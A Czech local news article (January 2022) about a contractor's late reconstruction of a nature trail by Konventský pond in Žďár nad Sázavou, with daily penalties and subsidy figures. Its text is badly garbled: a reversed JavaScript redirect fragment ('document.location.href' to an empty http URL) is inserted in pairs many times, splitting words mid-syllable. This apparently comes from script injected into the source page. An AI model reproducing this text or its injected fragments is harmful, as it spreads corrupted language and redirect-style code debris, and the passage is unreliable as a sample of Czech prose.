Rainbow page separator

Penále za nedokončenou stezku bude nabíhat po celou zimu

Pátek, 14. ledna 2022

Žďár nad Sázavou / Až na jaře a bez jakýchkoliv nedodělků převezme žďárská radnice zrekonstruovanou naučnou stezku vedoucí kolem Konventského rybníka. Stavbu zho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovitelská firma nestihla dokončit v dohodnutém termínu, tedy do konce lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu minulého roku. Za [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na základě smlouvy plyne penále ve výši 5800 korun za každý den zpoždění. Celková hodnota zakázky byla vyčíslena na 6,5 milionu korun, z čehož uznatelné náklady vztahující se k dotační podpoře činí 5,7 milionu a dotace samotná představuje 4,8 milionu korun.
Revitalizace naučné stezky, jejíž značná část vede podmáčeným terénem po povalových chodnících, začala loni na jaře. Původní dřevěné prvky z roku 2011 byly postupně demon[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny a nahrazovány novými z odolnějších druhů dřeva, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to včetně úpravy okolního terénu. Frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaná vycházková trasa, původně bezbariérová, aby ji mohli využívat i vozíčkáři nebo lidé s dětskými kočárky, byla v několika posledních letech ve špatném stavu a od června 2020 dokonce oficiálně uzavřená z důvodu bezpečnosti, když přívalový déšť poničil statiku některých dřevěných chodníčků.